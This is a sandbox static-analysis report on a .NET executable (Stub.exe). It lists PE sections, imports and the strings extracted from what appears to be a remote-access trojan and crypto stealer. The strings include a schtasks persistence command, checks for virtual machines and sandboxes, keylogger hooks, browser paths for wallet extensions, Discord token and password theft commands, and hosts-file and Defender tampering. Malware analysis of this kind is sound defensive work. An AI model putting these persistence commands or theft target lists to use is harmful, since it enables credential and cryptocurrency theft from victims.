Static | ZeroBOX

PE Compile Time

2023-06-03 07:17:26

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
| --- | --- | --- | --- | --- |
| .text | 0x00002000 | 0x0000fa84 | 0x0000fc00 | 5.54969476382 |
| .rsrc | 0x00012000 | 0x000007ff | 0x00000800 | 4.88486615034 |
| .reloc | 0x00014000 | 0x0000000c | 0x00000200 | 0.101910425663 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
| --- | --- | --- | --- | --- | --- |
| RT_VERSION | 0x000120a0 | 0x000002cc | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0001236c | 0x00000493 | LANG_NEUTRAL | SUBLANG_NEUTRAL | exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
code2024
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
toHgyTtXSPYA
CafRBmuezZA
tzpJIObHnnA
SystemParametersInfoA
MURMYvGkQCfGmmitA
unAnnmmFFUyHB
UVoaSKQwAJB
tGoZRwLCLB
ZDQdsgVZqTeQxNB
BTGUtnPiWiDzuKSB
FgONXcfBWYrSB
jawMeuUcivgB
UdeyfQAzYHEcAC
dJqFHLxusTZLVEC
LZEtUkYfRWJOFC
uboNFwFAHC
UpalVlrPOC
aZNZPWEGlLySC
PgXpVdgqGUC
xsNyoVviaWrcC
FXjKpMUvvriC
NEcQKCMCSeCunC
GiOUlwgPyC
qhWwoprpyED
MapNameToOID
get_FormatID
CvdKSpbdPBKD
hNVNsHbQNocWKD
UujFuMRSxTRD
HtcwICUREIQtSD
MDNVEitqbCJVaUD
tHBhCjudJjlcD
MDnCmubYAWdrD
VVVTEAyBypdVzD
nHdVnPHUhykXHE
GDkYnXjQJLE
VlexnzpYMvUE
jxWTEcyFDVVE
YQLkmRsHcgbE
wwcAhYUbZWbngE
WbuZWbhHfhE
BDdaPMPIjE
huUwkyZUjlE
keTZSmdBaMNpE
bauhEBlZSZwDF
XepzVesvUEF
foCvyhniFVF
uHSesKqteYF
BlbKsvSSZsIKuZF
MjWUkhfkJsDddF
MNnHnGLJoNTlF
NVXaqIoscrF
GQJaiLiqYQsF
fFiwTlsHryApqKG
drGTtjlhxsXLG
thKpVxjcDYBhRG
crcXcDSlTPTG
wZiwzjZzdbbG
PiaKdwKHzcKrwpCeG
PCTyDcUTInG
eVOgBmMbMsyJfxG
ScHatCJGmszG
YSlLwsZjnevBH
WqNydBsekHH
AmjcVEzQKRH
iPmHjZkjoJrSUVH
wusOnxPxdGyBRYH
JMXHLoEecZH
HNGjddbDytTaeH
XjzLDqozweFBqoH
AQvjBsvWVrQsvH
iPYMDRSrzH
ScxdTheICI
get_ASCII
VLJXHKKuKI
JegexZhacoVTI
MwLfuFwCfeTYI
EvHVcWUFSgI
JunOcXxiEpXigiI
YPyvCpDybCxfmI
AnSgwrbiTsGuI
yaOwPEkVxppDxI
WDdNyMEgVoLJ
XMhQhHfOcjwNJ
hpljuFRdzWFwWaQJ
MAyVNFZwELAzVVJ
ZMbCLcrsbMRsXJ
vgKIMmOsCjLYJ
HGxNFZKEGiVRQaJ
udYhylGLJyaMcJ
LiFOtDzKQoeJ
hBVdWEtiEqeJ
xhmrEbdxABK
JVtlpkWpWDK
wMyYygRkNWPUOK
iqqUzIhWAjK
vVXEQQjyxkEidboK
NjFyQEXCcIQFHKL
JMcnTfOojpOrQL
WVudpSDDtgqcL
nHBoYRuWIqL
lAwXDurZmuGwL
pobrpOkSEsBM
wsvpMrnNUqhVZVmEM
tQzfjbTFZOM
XwipZskwEUVhM
cIfGJKrSzLGBkM
avqmCJBdULvoQkM
IAewrVVbJyRpM
DSLByvPTwM
OXOjeJQHHN
HQYSoWNRjEscGFLN
GowuVHHwxzPN
RoEfXlUyUN
vwGLYrbkTSPaN
gTCYcgbAfN
dnnNFkJTiIyfN
GGOKPmeygIhN
MdGIiJcEWiN
thFKAJvfdRqcTjN
iPsEvznNFzMkN
RPhbcAIDQsxYnN
LflMsdDEbtN
xjGacXqfMIbryYyN
wMLdNtfQsHO
System.IO
QYCDGqHlZO
tmveapqLpVbO
pZDiHhlHibvvdO
MypGVLjXbiO
tclgGutFprolO
oBgmhPYscSP
UJfPJUMepsgeTP
vCbNYdAhUcUP
fjBBTTpscuaIcP
oXfUklfowveP
hUtEpEcHbSJuP
vXnWQwxmBKyCQ
RsguNIJhaFQ
fzZzDxAWoYDKIQ
YQNbtAGTTPQ
YZuqpZoFFXjSQQ
pRNAJuPfRQ
DRBbuPwersDjrQ
FGamRJFAzFtQ
uiroqKTDGXhvQ
krAsCvEVBNmwEWLR
WyHVTkrELZNR
iqLZsFfrBLQNbR
EBPlEoCMzvfcR
RDDxLTwGDkR
absyInQxqJSpR
SmKkCJAOuPtR
CYwnrrqNkqRvAS
WSCSzPhxSCREBS
ZBwdKyhLcjtPS
CHrmkDdgPyySS
sHzoMMjxSSYS
umqsWyeOjhS
BssmTYZgLrksS
lZYEYIfhtS
nZWZbWAHAT
VMZgiGFCpcSWBJT
IdQCJxtZRObwjLT
UmBsfiqCNT
RYrbHVkzadpORT
wWqXtBnqZTT
XJtHPBmOFZXT
sewmUCzsUTVEYT
puOdOJfiZTYT
CRWhRFxGplhfT
QpXptsJevMvfT
CVgzkantBTTSgT
bGOOSbwJuCXHWnEU
lFMcuNXbCXpU
SmIUtoxPvvysU
AswjEAFKJvU
aBAdEqUkaIZIByU
get_IV
set_IV
GenerateIV
SlItUNfQfIV
MwhFHosrIlnUV
pcgKajEYLlsjV
aXptjttxFW
QWhWtLeQXODMW
hHVmzfpclDBiNW
QXCdROYioORW
rZhSaaKKyqbW
ffOGSaqfLAZbfTdW
PyMgpCjFwrW
wjmXjYACGsrtSsW
epJxNSgInJpJX
LpxbQEMvUayPOX
zICRiPrGWTX
HmDxheVIEuUX
zSxRWpkDaGVX
JMqQPmwdLJlAVXX
WYhRLtdLjcNYX
BJneLxLUVulX
DRroZwxWBWtX
qSVgWnLWROzX
pOBAeDYhBiIEY
FsSzoETMqLfRiEY
GgjNqxNtlAZZwHY
ZmZhVHTtmgcTPY
QFYpGTekxdXbY
wUvDsHxYzZgY
vaNUgsItZmqGZqY
uPeLpAkVKpdrY
WiBTsbCOwoPOyY
QIYGfoLqQIAZ
evVoHIeajjXHZ
tdiqrsEbLZ
BflLKTICwPIVZ
SAsHXzyObZ
jUMsecWFFgZ
irOWAdQvmCeXMhZ
tZVJTpHncSiikZ
fowCTwqfkJjxqZ
value__
ggPARzDsAa
mtEwzcoOjFa
WvRepQDKMQKuLa
QltAROlsea
VzfCoBYcga
RVuOPGurcTpja
kDgtyoowVloa
kFWYriGhnva
RPTBFhcVyVHb
vzurcBGlNJpRb
mscorlib
XhFzafjBFUkDlb
sonqKCZfLc
RBmXUQDlLGRyMc
vklarwmslBQPc
iAprYRtXFjSc
qLLdNrEBOUdVc
pfYelBmnSfBZc
nVLbWIvKuDac
SipcbIutBcc
ZhJyXaPXrec
iqYNgZlaPNfc
System.Collections.Generic
Microsoft.VisualBasic
LRbTLYzKzjc
get_SendSync
BgBvDIPPHrc
MAQWeKnDvc
LXDfvyzbggOUTxc
HOQieEXeGd
NJStyOoSuGd
BRIlEcoNWYXAId
GetWindowThreadProcessId
GetProcessById
HaqxKwoTGOQd
kiHseCOxcTd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
XOBxWvjZItzgd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
TvzDifeTEtUmd
Append
RegistryValueKind
CompareMethod
method
pIpEuamwpd
Clipboard
yrDCjGWNekMkud
eBVHsmjBcZXDe
nDrbNlOqakFaXe
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
sQlCMFxyMGnfse
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
jJfEvsLGMrte
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
wTESOKyOoscGf
SizeOf
HtbYUtIfFQVf
esBCemRrZf
DeenjIQfubf
nNPbXMOPXgkf
UnMWQzSrof
IRGKMqUbMCqf
xNtWHzKxtf
TBRDntOExQIsrxf
PCOPOkIpaeyigBg
cZbDcuvquZUJg
MXxVsOCIwIsPTg
MEDPcAyRaHsTg
BrwrTppzAoMTfbg
mSDPdfxvcbWHDXig
CryptoConfig
hyLMhrSVONlg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
rrCsOZrMXXog
set_ErrorDialog
CCarMAnDzSpOtzXqg
dwVmIGwaqDrg
SOaptrkGUGBh
FFbmRnCraGsBh
dfEfRLIuKh
GRXyvrQtUh
RBUeRINdBbbh
mxBPPLCTbIpjhteh
mnpvRbelRCgh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
TBWrTFbeoHxh
JWouhuObHEGNxh
qIPHBBDHTbISzh
oQRrvXFYMIroCi
xqSCTUNWaebEVExHi
PbqVlfBIYSMi
xBoJVCHgUdFBlNi
RtTFUUszzPQi
UeqAswtITi
BOrXeOmtsARMfi
pMeEBGfMOvfi
nafeZzdqii
vQpeZaSCWtXki
XYbqQaATXWBri
BcwPzRCqPCCBlXCj
lwYLUPWUmDj
VetLTKIXVPOj
MxlyEDvkbLgQrZUj
FRvNCZpiCFpj
uYpfWMrNdLKQvj
WNFvWrsXTBk
kkHgJGrtewNPFk
kQedXPcxmzSQxmNJk
onbmuntKtfKk
rwsAntVaHmIxSk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
ygZyAUGZrBoEMjk
XlAqHQfXxkk
cWEajBTaztk
ZysNimzpMrHxk
ZEdBUShQSVvOyk
GLtEIZwlHqdIl
ZysoTjWgbOl
eLWsulpLOqUPl
KcTAcKyzWntSl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
ZeNkMNvRZbl
ZFLTvkDELhl
kernel32.dll
user32.dll
ntdll.dll
BIJdTAhNtKpgol
wnXNIFFhajRql
QwotJmpAQSOm
RauhJhALyPm
dNbXbFrLjfXaVm
uYfkgfvvnwWm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
oIghCqDryqzKQzSem
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
BivfjwOhJfwm
hsaAVBKpvVzBn
zxkomLgodZNn
nLUaUVxsRbTn
eGzxKdCUfFrHQTUn
QnCCqTxXDAVn
RTcWuolrtlxvjXn
DRWZeWzUbYixZn
ToBoolean
vSuJjpEeuxuEoan
TimeSpan
EfVGRbsmqfn
ucLGZXxaaGphn
kwozrqDjQWin
X509Chain
AppDomain
get_CurrentDomain
vCZQBgIKTsbln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
dlOvvcvaFrjpn
ZWoxHDdTxyn
JrEzQYIrqVdkBo
BKEceVTSuGo
QUBSGIFyWgHo
HbIRdekukDcQPo
YhwgMfAltbfo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
UbFaHwNwAOAso
DeyotjpwqAwSso
IyopdueVFGyuo
pprFWFcNcuGqwo
ATtDQUQAwCp
npfhEGrMATMvWDp
ElUmvViNKnIjGp
yerNjQcUSp
omFsWKpdiCWp
FnIjafNyoip
sNEVHZNpKvNop
Microsoft.CSharp
kLSDVfmSIkvp
AreoYTGyHlcfEq
zhHUYlPUtsGGFHq
dctnuRxUlkQq
xcAUYxgTIjrunVq
System.Linq
SyiojPxFDgorq
nBOnItxWtq
IGMYfbtPWXEr
TkUMDesdiwKr
EkBdUfJffVjMfuYr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
HsVBxWAUxXQiCGSYCs
UwmmhhUQqHs
cKIyZBAvHeNFTs
System.Diagnostics
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
aUAjlIlOxdjxs
hCXoMIhlTNTzs
LAEfLofINYTFt
bHkHJIFvyNjPwXLt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
cbTnoTYTwdt
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
op_Explicit
IAsyncResult
result
qxTiMTcdmt
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
gdmUnSKUot
GetPathRoot
dhrDZOqlhArt
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
ntSYDyNcwt
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
BJCEaJihmDmLIDu
exgdsPcCNgRGPRu
ufHqpDZOqscu
ThcNlIgmiu
fClanLhezAlu
jsooftlFPHmu
kLrvZVHRuu
prmUgyPuMqTwu
bPgkoECQDuzu
LDkmkvPlgNCv
OGYQAxxbbEv
oLAyYmjmliMv
gDBwxrGpQv
BKsoFTAikvyDmLTv
gbjcvPaXeJFSpcv
pyDyvKpAhDFpCw
uSmrzpklIEw
hWWVbCnHKMw
cnJMIBiqzFdQw
sERTRnUWhFVw
PvoLsNLKarYbw
lvTnWoVAoXVcw
myIXGxfkMqkcw
MjStIaaCCdw
rKufgSlRZhlw
QxowGIBolw
jBafeZJascFdmw
cHzJHvWknw
GetForegroundWindow
set_CreateNoWindow
iETocOljWCGlZfoxw
MBKQNdBiUDx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
VdkkIFrUuFx
CoYMnPwPOJx
FADitUQwsDGGYx
TMOvOfOxtsx
gaWHcjeoeQux
zKtpAOOerux
ciplZkXgUxx
iPjcOzKKaLQBXfmoPzx
QsayfmcInvHOy
JWzDYipLuDKQy
InitializeArray
ToArray
get_AsArray
WySrmealByujdy
LCcBuLlznPQKCey
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
zCzMkxvWCPmy
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
rDoCAZXcqLrty
wbmMYHqTsExeOz
XFpvkwZyUQvNLRz
LHOxImSEAVqVz
UoDFVtarYz
hcoPNwhTSQcxbz
futXdBCmhPdz
TZRKCituJDgz
GKSPZKssDswgz
AYFLuaniKhShz
QfmSvDErvltz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.6
FrameworkDisplayName
.NET Framework 4.6
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
cP41bVHrfWQN3yibWPP7g81MQILoGfb/FzI1Rak27O9cNK5EeZLxGqrQCLwlE1KLrf2HhI/MgwI49qaEpihapw==
YngbdehlxdLT4J3pFFF0HwT7XFMQ2n81lv0ngOgaXFRBKLsMDRnzxO52qyaUnsk4oK6ar0hUz2TA9T6tIQm9Ykv1uLO/a5NJx8iBrjoDYKQ=
M7SvjoS8RWSqYR0NbQdzGYvEn4WD6zxz6U2XWETRRcT7X4ANggFPQimpqrtsQA3ie4EBusw7ar3nsVYFXWMWIVMQQTbs1d0Mp+SF6VyZbP4=
Zhx+zhD4FgygpDr+gsevYL6uOe8DJHR29tk7FxYVkuFGdezrASwY7bHOklVfeHPjlLFKeAqtaCZY3O2ynZNRag==
%AppData%
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
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
ResetHosts
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
\drivers\etc
\hosts.backup
\hosts
127.0.0.1
Blocked!
cmd.exe
/c taskkill.exe /im chrome.exe /f
Reset Hosts succeeded!
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
